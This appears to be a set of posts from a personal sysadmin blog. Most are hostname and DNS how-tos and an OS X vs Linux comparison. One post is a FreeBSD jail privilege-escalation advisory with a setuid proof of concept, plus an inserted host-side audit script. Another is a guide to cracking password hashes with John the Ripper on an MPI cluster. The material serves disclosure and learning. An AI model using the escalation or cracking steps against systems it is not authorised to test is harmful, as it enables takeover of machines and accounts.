How to: Change the hostname on Fedora 15

Change the entry in /etc/hosts and /etc/sysconfig/network.
If you’re using network, then run as root: service network restart
If you’re using network-manager, then run as root: service NetworkManager restart

How to : Change the hostname on Ubuntu 11.04

Follow these steps in order to change the hostname on Ubuntu Server
1. Execute sudo hostname host.domain , replace host.domain with your hostname, example: laptop.petur.eu
2. Edit the /etc/hosts file.
3. Edit the /etc/hostname file.
4. Edit the /etc/resolv.conf file if needed.
5. Reboot the server (highly recommended although not required)
 

Rooting FreeBSD, Privilege Escalation using Jails


Author:
Pétur Ingi Egilsson <petur@petur.eu>
Description:
A remote user with root privileges in a FreeBSD jail and user privileges on the jail’s host machine can obtain root privileges on the host machine.

Affected:
FreeBSD 8.2 – Confirmed
Proof of concept:
From within the jail:
Compile the following using gcc and move the resulting executable to /tmp/a.out
#include <stdio.h>
#include <stdlib.h>
/* Prints the name of the effective user the program runs as. */
int main(void){
system("whoami");
return 0;
}
Make sure /tmp/a.out is owned by root and that it has the setuid flag set ( chmod u+s a.out )
From within the jail’s host as a regular user:
Locate the jail’s directory structure ( use the command ‘jls’ )
Execute the a.out program
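
The two preconditions above (a setuid file inside the jail, and a jail directory tree that a regular host user can walk into) can be checked from the host. The audit script below is an added example, not part of the original advisory; the function names and the optional STOP argument are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): host-side audit for the
# condition described above. Pass the jail root paths that jls reports.

# list_setuid ROOT: print regular files under ROOT that have the setuid bit.
list_setuid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null
}

# others_can_reach DIR [STOP]: succeed if DIR and every ancestor below STOP
# (default /) grants search permission to "other", so that an unprivileged
# host user can walk into DIR. DIR must be an absolute path.
others_can_reach() {
    _dir=$1
    _stop=${2:-/}
    while [ "$_dir" != "$_stop" ] && [ "$_dir" != "/" ] && [ "$_dir" != "." ]; do
        [ -n "$(find "$_dir" -maxdepth 0 -perm -001 -print 2>/dev/null)" ] || return 1
        _dir=$(dirname "$_dir")
    done
    return 0
}

# audit_jail ROOT [STOP]: return 2 when setuid files inside the jail are
# reachable by unprivileged host users, 0 otherwise.
audit_jail() {
    _hits=$(list_setuid "$1")
    if [ -z "$_hits" ]; then
        echo "ok: no setuid files under $1"
        return 0
    fi
    if others_can_reach "$1" "$2"; then
        echo "EXPOSED: host users can reach setuid files under $1:"
        echo "$_hits"
        return 2
    fi
    echo "contained: setuid files under $1, but the path is closed to other users"
    return 0
}

if [ "$#" -gt 0 ]; then
    # Audit every jail root given on the command line.
    for _jail in "$@"; do audit_jail "$_jail"; done
else
    # Constructed demo tree in a temp directory, not a real jail.
    _t=$(mktemp -d) || exit 1
    mkdir "$_t/jail"; chmod 755 "$_t" "$_t/jail"
    : > "$_t/jail/a.out"; chmod 4755 "$_t/jail/a.out"
    audit_jail "$_t/jail" "$(dirname "$_t")" || true
    rm -rf "$_t"
fi
```

Run it as root on the host so that find can read every jail. Removing search permission for other users on a directory above the jail roots (for example mode 700 on their parent) takes away the host-side half of the problem.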
 
Comments?

Speed up your Internet browsing on Linux with a DNS Cache server

Most Linux distributions, unlike OpenSuSE, OS X and Windows, do not have a DNS Cache service installed by default.
Your computer needs to look up a website’s IP address every time you visit it. The lookup request is passed on to the DNS server(s) specified in the /etc/resolv.conf file. It will take the server a few ms (milliseconds) at best to respond. It can take a ‘long’ time if you’re using a slow Internet connection (or a wireless LAN).
A caching DNS server acts just like a regular DNS server from the user’s point of view. The service is configured to respond to lookup requests and return IP addresses. If the caching DNS server does not know the answer to a request, it simply forwards the request to the correct server and then forwards the reply to you once it has been received.
So what’s the difference?
A caching DNS server holds a small database of recent requests, so to speak. It keeps each entry in its database for a specified amount of time (more about TTL). If the caching DNS server receives a request for an entry currently in its database, it responds instantly without contacting any other servers. If the caching DNS server is on your local computer, this will occur in 0 milliseconds.
You can check the response time of your DNS server by running the following command:
dig google.com | grep "Query time"
Let me demonstrate this by running the command two times on two different targets and explain the output.
petur@petur-desktop:/etc$ dig google.com|grep "Query time"
;; Query time: 49 msec
petur@petur-desktop:/etc$ dig google.com|grep "Query time"
;; Query time: 51 msec
Look at the above output. 49 msec (milli seconds) and 51 msec. The small difference between the lookup time for the two requests indicates that the DNS server I’m using has the answer to the request in the cache. Google.com is after all a very popular destination and someone on my campus has probably visited it recently.
What about a site nobody on my campus is likely to visit? I’ll go for australian.jp
petur@petur-desktop:/etc$ dig australian.jp|grep "Query time"
;; Query time: 610 msec
petur@petur-desktop:/etc$ dig australian.jp|grep "Query time"
;; Query time: 46 msec
The first request took 610 msec, that’s because the DNS server I’m using didn’t know the answer to my request and had to contact the DNS in charge of australian.jp (which I guess is located somewhere in Japan).
Now, the second request took only 46 msec, that’s because the DNS I’m using has cached the request and does not have to contact the _Japanese_ server again any time too soon.
When the caching DNS server receives a lookup request, it first checks whether it has the answer cached; if not, it contacts the server responsible for the domain in question.
I would like to shave those 50 msec, on average, off each site I visit on the web.
I’ll show you how this can be done on Ubuntu Linux.
Begin by installing dnsmasq either from “Applications->Ubuntu Software Center” or by using the command sudo apt-get install dnsmasq from the console.
Next you’ll need to change the order of your DNS servers. Do this by going to “System->Preferences->Network Connections”
Select the name of the connection you are using and click Edit…
Go to IPv4 Settings
If you have “Method: Manual”, put “127.0.0.1,” (without the quotation marks) in front of whatever it says in your “DNS servers:” field.
If you have “Method: Automatic(DHCP)” -> Change to “Automatic (DHCP) address only” and put “127.0.0.1,8.8.8.8” in the “DNS servers:” field.
8.8.8.8 is Google’s DNS server; you might want to replace this with the one provided by your ISP (Internet Service Provider).
Restart the network-manager service by executing the command sudo service network-manager restart from the command line.
You now have a DNS Caching service running on your computer.
Let me demonstrate the benefit:
petur@petur-desktop:/etc$ dig australian.jp|grep "Query time"
;; Query time: 610 msec
petur@petur-desktop:/etc$ dig australian.jp|grep "Query time"
;; Query time: 0 msec
 
Other Linux distributions:
1. Install dnsmasq
2. Put “nameserver 127.0.0.1” at the top of your /etc/resolv.conf file
3. You might have to bring your interface down/up using ifconfig or ifdown/ifup

Questions or comments?

How to: Change the hostname on Ubuntu Server

Follow these steps in order to change the hostname on Ubuntu Server
1. Execute sudo hostname host.domain , replace host.domain with your hostname, example: laptop.petur.eu
2. Edit the /etc/hosts file.
3. Edit the /etc/hostname file.
4. Edit the /etc/resolv.conf file if needed.
5. Reboot the server (highly recommended although not required)
 

How to flush DNS cache Linux, Mac OS X, Windows

To flush DNS cache on Microsoft Windows (Win Vista, Win 7)

Run the command prompt with Administrator privileges

Type ipconfig /flushdns

To flush the DNS cache on Linux, restart the nscd daemon:

Linux does not cache DNS by default. Some systems might have a DNS caching service such as nscd. Restarting the DNS caching service will flush the DNS cache.

To restart the nscd daemon, type /etc/rc.d/init.d/nscd restart in your terminal; on Ubuntu or Debian you need to use sudo service nscd restart instead

To flush the DNS cache in Mac OS X 10.6 Snow Leopard

Type dscacheutil -flushcache in the Terminal

 


Linux can be hacked with a USB device.


A bug in the Caiaq USB driver, which could be used to execute arbitrary code at the kernel level, has been reported by Rafael Dominguez Vega of MWR InfoSecurity.

The device drivers are vulnerable to a buffer overflow condition when a USB device with an unusually long name (over 80 characters) is connected to the machine. This is due to the use of strcpy() without testing the length of the string being copied, enabling the attacker to execute malicious code on the target machine.

In order to exploit the vulnerability the attacker would have to have physical access to the target machine. It does not matter how secure a computer is: as long as any human has physical access to it, he or she can be manipulated with social engineering techniques such as mailing the victim a maliciously crafted USB chip along with a note stating that it contains pictures of him or his family.

Having an encrypted hard drive would not help in such a situation: once the user has logged on to the machine, the kernel has access to the filesystem.

Fortunately a fix has been released and should hit your distribution repos soon.

 


5 Things OS X Does Better than Linux

This article is written with the average user in mind, be it my girlfriend or my grandmother working on their personal computers without access to an IT department. They don’t know that OS X is built on top of UNIX and in fact I think they don’t care. To them, the command line is something which was used in The Matrix and they have no intention of buying a book about it.

Linux is, without doubt, a good operating system, although I feel more needs to be done to de-alienate it for the average user. I’ve been using Linux as my primary OS for the last 12 years. A few months ago I decided to give OS X a try and since then I’ve been spending more and more time using it.

I’m going to list 5 things I feel OS X does better than Linux, or should I say Ubuntu Linux to be more specific?
1. The User Interface

The OS X user interface is beautiful and elegant. Stability is not an issue, and the overall experience is of a product which is aimed towards productivity, as everything seems to be just a mouse click away.

Developers are expected to follow the “Apple Human Interface Guidelines”, which makes their software GUI simple and friendly for new users, while more experienced users will find advanced and less frequently used functions hidden away under the File, Edit, etc. buttons.

Installing applications is easy, just drag them to the Applications folder. No need to worry about package dependencies or installing from the command line.

2. Service management

Sharing files, printers and scanners is just a mouse click away. Editing the permissions for those shares can be done from the Share GUI, with no need to manually edit configuration files. The same goes for FTP, WWW and SSH and the built-in firewall; those can be enabled from the GUI and configured there as well.
3. Backup

Backing up your data is without doubt one of the most important tasks you should do regularly on your computer, yet most people are not doing it.
They say it’s too complex and time consuming.

Those people I know who take backups regularly do it by copying their files manually (on Windows) to an external drive, or use rsync on Linux whenever they feel like it.

Apple tackles this problem with Time Machine; in fact you are asked whether you would like to set it up right after you first log in on your new Mac.

Time Machine takes incremental backups of your whole computer every hour, either to another hard drive or to Apple’s Time Capsule (Time Capsule is a network attached storage device). Restoring files or complete backups using Time Machine is very easy, as expected from Apple.

4. Migration

Buying a new computer is something I do on a regular basis. A day or two of setting up and configuring the new machine usually follows: reinstalling the packages I use and migrating my data.

OS X has a pretty neat utility called ‘Migration Assistant’, which allows you to migrate all your files, folders, applications, and applications settings to a new machine, be it over FireWire, Ethernet or by using an external disk.

This is much better compared to rsync and apt-get, as you don’t need to have any knowledge of the command line utilities, the file system hierarchy or package managers.

The Migration Assistant GUI is very easy to use and takes you through the whole process step by step, describing each step in layman’s terms.

5. Flash

Adobe Flash is a problem on Linux. Your machine might be fast enough that it doesn’t bother you, but it still uses up a lot of the CPU.

I’m sick and tired of listening to the CPU fan grinding like there is no tomorrow on my Ubuntu laptop every time I visit YouTube, play Flash games in my browser or visit a website which has Flash ads.

As this is not the case with Flash on OS X, I decided to list it here. Be it Adobe’s fault or not, I’m a computer user and I expect things to just work.

Conclusion

OS X is a very powerful UNIX environment aimed towards the average user. New users will enjoy the elegant user interface while not having to worry about loss of data, stability issues or viruses. Reboots are rare and the power saving features of the OS are excellent. Apple wants developers to make a note of this and informs them that they should design their applications to run for days or even weeks without the user having to restart them.

It is easy to share files and printers with others, while being confident about permissions and restrictions.

Migrating all your settings and applications to a new Mac, once the current one comes closer to its end of life, is easy enough to be performed by the average grandmother.

More advanced users will appreciate the power of the underlying UNIX, which comes with the most popular UNIX commands. Those looking for more command line programs should take a look at “The MacPorts Project” found at www.marports.com

Do you have anything to add?

How-to: John the Ripper on a Ubuntu 10.04 MPI Cluster

In this post I show step-by-step how you can set up your own “super computer cluster” from multiple machines using an Ubuntu MPI cluster, with the goal of brute-forcing strongly encrypted passwords with John the Ripper for academic purposes.

Owners of quad core machines will also benefit from this setup as the “john” binaries found in the Ubuntu Repositories are compiled to run on only one core. I managed to decrease the time required to crack password hashes using this setup.

The post is meant to be plain and simple, aimed towards the average user, thus I chose not to implement NIS, NFS, BIND, and other more complex technologies. A student should be able to set up and play with a computer cluster system at home without spending days reading through Linux systems-administration books and manuals. I make use of Ubuntu 10.04 Server as it is the most commonly used available Linux distribution today and it’s an LTS (Long Term Support) version, which will be supported till 2015.

I suggest “MPI Programming” as the Google keyword for those interested in learning how to write programs for such systems.

If you have any suggestions, problems or comments, or would like to contribute to this document, leave a comment or email me.

Foreword

First of all I must state that I’m no expert on MPICH; this guide is written by a hobbyist.

The cluster implementation presented in this paper is not meant for environments where high availability and security are an issue.

History

I found myself in a situation where I had to break up an old password of mine. Having a couple of computers around I started looking for a way to get them all working together.

This paper is the result of extreme frustration, an overdose of coffee and a sleepless night.

Requirements

At least two networked computers running Ubuntu Linux version 10.04.

John does not require much bandwidth.

Configuring the Server

Requirements

A static IP address or a reserved IP in DHCP.

Required packages

The following packages are required:

  • libmpich1.0-dev  —  mpich static libraries and development files
  • libmpich-mpd1.0-dev — mpich static libraries and development files
  • libmpich-shmem1.0-dev — mpich static libraries and development files
  • openssh-server — secure shell (SSH) server, for secure access from remote machines
  • mpich2 — Implementation of the MPI Message Passing Interface standard
  • mpich2-doc — Documentation for MPICH2
  • john — active password cracking tool
  • build-essential — Informational list of build-essential packages

petur@server:~$ sudo apt-get install libmpich1.0-dev libmpich-mpd1.0-dev libmpich-shmem1.0-dev mpich2 mpich2-doc john openssh-server build-essential

Network configuration

By default the /etc/hosts file looks like this:

127.0.0.1 localhost
127.0.1.1 server.petur.eu server

# The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

You need to change the 127.0.1.1 to your IP address.

<server.petur.eu> should be your FQDN and <server> is your machine’s hostname.

Find your IP by executing:
petur@server:~$ ifconfig|grep "inet addr"

inet addr:10.0.0.1 Bcast:10.255.255.255 Mask:255.0.0.0
inet addr: 127.0.0.1 Mask:255.0.0.0

/etc/hosts should look like this after you have changed it:

127.0.0.1 localhost
10.0.0.1 server.petur.eu server
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

User configuration

Create a new user called ‘cluster’ and add ~/bin/ to its PATH.

I find it most convenient to use the same pass for ‘cluster’ on every machine.

petur@server:~$ sudo useradd -m -s /bin/bash cluster
petur@server:~$ sudo passwd cluster

Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

petur@server:~$ sudo su - cluster -c "mkdir ~/bin;export PATH=~/bin:$PATH"

Configuring MPICH

MPI makes use of the following configuration files:

• ~/.mpd.conf

NOTE: The file begins with a .

This file must be chmod 600

The file contains a single line “secretword=<password>” (replace <password> with your password, which must be the same in all ~/.mpd.conf in the cluster).

• ~/mpd.hosts

Contains the list of all nodes in the cluster, including the server.
The format of the file is “host:number-of-cpu-cores”, e.g. 10.0.0.2:4 if 10.0.0.2 has 4 cores.

The number of cores can be set lower than the actual core number if you only want MPICH to use a specific number of cores without regard to the number of available cores.

For example, if the server has a quad core processor you might want to set the value to :3 instead of :4 so the server can be used for something else.

DO NOT use localhost or 127.0.0.1, you MUST use a network reachable IP.

Check the number of cores available, and create the configuration files.

cluster@server:~$ touch ~/.mpd.conf
cluster@server:~$ chmod 600 ~/.mpd.conf
cluster@server:~$ echo secretword=pass>~/.mpd.conf
cluster@server:~$ /sbin/ifconfig|grep "inet addr"
inet addr:10.0.0.1 Bcast:10.255.255.255 Mask:255.0.0.0
inet addr:127.0.0.1 Mask:255.0.0.0
cluster@server:~$ cat /proc/cpuinfo|grep processor|wc -l
1
cluster@server:~$ echo 10.0.0.1:1>~/mpd.hosts

Check if everything is in order by executing the following commands.

• mpdboot – start the cluster
• mpdtrace –  list all nodes in the cluster
• mpdallexit – shut down the cluster

cluster@server:~$ mpdboot
cluster@server:~$ mpdtrace
server
cluster@server:~$ mpdallexit

If the commands executed without any errors then you’re all set. If not, review the permissions on your ~/.mpd.conf, your /etc/hosts and the contents of your ~/mpd.hosts
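
A preflight check for the rules above (mode 600, one secretword line, host:cores entries, no loopback names), added here as an example and not part of the original guide. The function names are made up for illustration, and the hosts check enforces only the host:cores form this post uses.

```shell
#!/bin/sh
# Added example (not from the original post): preflight check for the two
# MPD files described above. Usage: sh check.sh ~/.mpd.conf ~/mpd.hosts

# check_mpd_conf FILE: must exist, be mode 600 and hold one secretword= line.
check_mpd_conf() {
    [ -f "$1" ] || { echo "$1: missing"; return 1; }
    _mode=$(ls -ld "$1" | cut -c1-10)
    [ "$_mode" = "-rw-------" ] ||
        { echo "$1: mode is $_mode, run chmod 600"; return 1; }
    _n=$(grep -c '^secretword=.' "$1" || true)
    [ "$_n" -eq 1 ] ||
        { echo "$1: expected one secretword=<password> line, found $_n"; return 1; }
}

# check_mpd_hosts FILE: every entry is host:cores and none is a loopback name.
check_mpd_hosts() {
    awk -F: '
        BEGIN { bad = 0 }
        /^[ \t]*$/ { next }
        NF != 2 || $1 == "" || $2 !~ /^[0-9]+$/ || $2 < 1 {
            printf "line %d: expected host:cores, got \"%s\"\n", NR, $0
            bad = 1; next
        }
        $1 == "localhost" || $1 ~ /^127\./ {
            printf "line %d: %s is loopback, use a network reachable IP\n", NR, $1
            bad = 1
        }
        END { exit bad }
    ' "$1"
}

# total_cores FILE: sum of the cores column, the largest useful mpiexec -np.
total_cores() {
    awk -F: 'NF == 2 { sum += $2 } END { print sum + 0 }' "$1"
}

if [ "$#" -eq 2 ]; then
    check_mpd_conf "$1" && check_mpd_hosts "$2" &&
        echo "ok: $(total_cores "$2") cores listed"
else
    # Constructed sample input in a temp directory, not from a real cluster.
    _d=$(mktemp -d) || exit 1
    ( umask 077; echo 'secretword=example-only' > "$_d/mpd.conf" )
    printf '%s\n' '10.0.0.1:1' 'localhost:4' '10.0.0.2' > "$_d/mpd.hosts"
    check_mpd_conf "$_d/mpd.conf" && echo "mpd.conf ok"
    check_mpd_hosts "$_d/mpd.hosts" || echo "mpd.hosts needs fixing"
    rm -rf "$_d"
fi
```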

Installing John the Ripper

An MPI patched John the Ripper version can be found at www.bindshell.net/tools/johntheripper

cluster@server:~$ mkdir source
cluster@server:~$ cd source
cluster@server:~/source$ wget http://www.bindshell.net/tools/johntheripper/john-1.7.2-bp17-mpi8.tar.gz

Unpack it and run make from the src directory (use make|less if your resolution is too small)

cluster@server:~/source$ tar -zxf john-1.7.2-bp17-mpi8.tar.gz
cluster@server:~/source$ cd john-1.7.2-bp17-mpi8/src/
cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ make

You will be presented with a list of options.

To build John the Ripper, type

make clean SYSTEM

where SYSTEM can be one of the following:
linux-x86-mmx Linux, x86 with MMX
linux-x86-sse Linux, x86 with SSE2 (best)
linux-x86-any Linux, x86
linux-x86-64 Linux, AMD x86-64, 64-bit native w/SSE2 (best)
linux-x86-64-mmx Linux, AMD x86-64, 32-bit with MMX

I’ve found linux-x86-sse2 to give the best performance on my intel based workstation.

cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ make clean linux-x86-sse2

If the program compiles OK, check that it works

cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ ../run/john -format=DES -test

Benchmarking: Traditional DES [128/128 BS SSE2]… DONE
Many salts: 1994K c/s real, 1994K c/s virtual
Only one salt: 1658 c/s real, 1654K c/s virtual

Move your newly compiled executables to ~/bin

cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ mv ../run/* ~/bin

Run john and make sure you have the _mpi version.

If you do not, then something is wrong with your PATH.

cluster@server:~/source/john-1.7.2-bp17-mpi8/src$ john|grep version

John the Ripper password cracker, version 1.7.2_bp17_mpi

Configuring extra nodes

Do the following each time you add a new node to the cluster.

This particular node has the IP address 10.0.0.2

Prerequisites

A static IP address or a reserved IP in DHCP.

Network configuration

Follow the same instructions as for the server, but of course use the correct IP address.

Required packages

Same as on the server.

User configuration

Choose the same password for ‘cluster’ as you did on the server.

petur@node1:~$ sudo useradd -m -s /bin/bash cluster
petur@node1:~$ sudo passwd cluster
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
petur@node1:~$ sudo su - cluster -c "mkdir ~/bin;export PATH=~/bin:$PATH"

Configuring MPICH

The following commands are to be executed from the server and not on the new node.

Configure passwordless SSH from the server to the node.

cluster@server:~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/cluster/.ssh/id_rsa):
Created directory ‘/home/cluster/.ssh’
Enter passpharse (empty for no passpharse):
Enter same passpharse again:
Your identification has been saved in /home/cluster/.ssh/id_rsa.
Your public key has been saved in /home/cluster/.ssh/id_rsa.pub.
The key fingerprint is:
0f:d7:c4:14:cf:06:11:d5:80:ec:1f:c3:f3:3b:7f:22 cluster@server
The key’s randomart image is:
[picture omitted]

cluster@server:~$ ssh cluster@10.0.0.2 mkdir -p .ssh
cluster@10.0.0.2’s password:

cluster@server:~$ cat .ssh/id_rsa.pub | ssh cluster@10.0.0.2 'cat>>.ssh/authorized_keys'

cluster@10.0.0.2’s password:

cluster@server:~$ ssh cluster@10.0.0.2 'cat /proc/cpuinfo|grep processor|wc -l'
2
cluster@server:~$ echo 10.0.0.2:2 >> ~/mpd.hosts

cluster@server:~$ for i in `cut --delimiter=: -f1 ~/mpd.hosts`;do scp ~/.mpd.conf cluster@$i:~;scp ~/mpd.hosts cluster@$i:~;done

The authenticity of host ‘10.0.0.1 (10.0.0.1)’ can’t be established.
RSA key fingerprint is 2d:94:c6:40:b0:02:04:d9:86:c8:16:f3:e6:a7:9f:35.
Are you sure you want to countinue connecting (yes/no)? Yes
Warning: Permanently added ‘10.0.0.1’ (RSA) to the list of known hosts.

cluster@10.0.0.1’s password:
mpd.conf 100% 16 0.0KB/s 00:00.
cluster@10.0.0.1’s password:
mpd.hosts 100% 22 0.0KB/s 00:00
mpd.conf 100% 16 0.0KB/s 00:00.
mpd.hosts 100% 22 0.0KB/s 00:00

Now add the line:
10.0.0.2 node1

to the /etc/hosts file on the server.

The final step is to replace the /etc/hosts on ALL of the node machines with the new /etc/hosts from the server. If this is not done then the following error will be shown when you try to boot the cluster:

mpdboot_server (handle_mpd_output 407): failed to handshake with mpd on 10.0.0.2; recvd output={}

Installing John the Ripper

Same as on the server.

Basic commands

Boot up the cluster using ‘mpdboot --verbose --ncpus=1 -n 2’

• --verbose :: gives us a better overview of what’s going on in case of a failure.
• --ncpus=1 :: tells the server machine to assign 1 core to the cluster.
• -n 2 :: use 2 computers (server + 1 node).

NOTE, there are two dashes (-) in front of verbose and ncpus

cluster@server:~$ mpdboot --verbose --ncpus=1 -n 2
running mpdallexit on server
LAUNCHED mpd on server via
RUNNING: mpd on server
LAUCNHED mpd on 10.0.0.2 via server
RUNNING: mpd on 10.0.0.2

Check if the cluster is working:

mpdtrace – lists all the nodes in the cluster

mpiexec -np 3 hostname, means “run the hostname command using three cores”

cluster@server:~$ mpdtrace
server
node1

cluster@server:~$ mpiexec -np 3 hostname
server
node1
node1

mpdallexit – Shuts down the cluster

cluster@server:~$ mpdallexit

Using the MPI cluster to crack passwords.

I’ll use a simple MD5 hash as an example.

cluster@server:~$ echo user:47584a15f1ba6c65da3a2ef8e43e606b > crackme1.md5
cluster@server:~$ mpdboot --ncpus=2 -n 2

Enter the following as one single line.
cluster@server:~$ for i in `cut --delimiter=: -f1 ~/mpd.hosts`;do scp ~/crackme1.md5 cluster@$i:~;done

The above command used to distribute files to the cluster can be easily scripted.

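— distributer.sh begins —

#!/bin/bash

# usage: ./distributer.sh filename
# Copies the given file to the home directory of 'cluster' on every
# host listed in ~/mpd.hosts (the part before the colon on each line).

for i in `cut --delimiter=: -f1 ~/mpd.hosts`;do scp "$1" cluster@$i:~;done

— distributer.sh ends —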

Use ctrl+c once the password has been found.

cluster@server:~$ mpiexec -np 3 john --format:raw-MD5 crackme1.md5

Loaded 1 password hash (Raw MD5 [raw-md5 SSE2])
Loaded 1 password hash (Raw MD5 [raw-md5 SSE2])
Loaded 1 password hash (Raw MD5 [raw-md5 SSE2])

petur1 (user)

Process 2 completed loop.

Threat: 2 guesses: 1 time 0:00:00:02 (3) c/s: 5616K trying: petciL – petusc

^Ccluster@server:~$

Remember to shutdown the cluster service after use

cluster@server:~$ mpdallexit

Download this article as PDF here: [ENGLISH] [ICELANDIC]
